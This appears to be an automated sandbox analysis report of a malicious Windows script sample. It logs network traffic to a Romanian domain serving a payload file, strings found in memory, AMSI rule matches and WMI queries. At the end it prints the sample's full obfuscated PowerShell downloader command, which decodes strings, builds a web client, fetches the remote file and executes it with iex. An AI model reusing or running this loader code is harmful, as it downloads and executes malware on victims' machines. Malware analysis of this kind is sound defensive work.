Source: Submited Sample |
Integrated Neural Analysis Model: Matched 98.3% probability |
Source: unknown |
HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2 |
Source: |
Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e |
Source: global traffic |
DNS traffic detected: DNS query: deseuri-romania.ro |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://deseuri-romania.ro |
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB_q |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbP |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbXR0l |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2 |
Source: amsi64_7608.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7852.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaCons |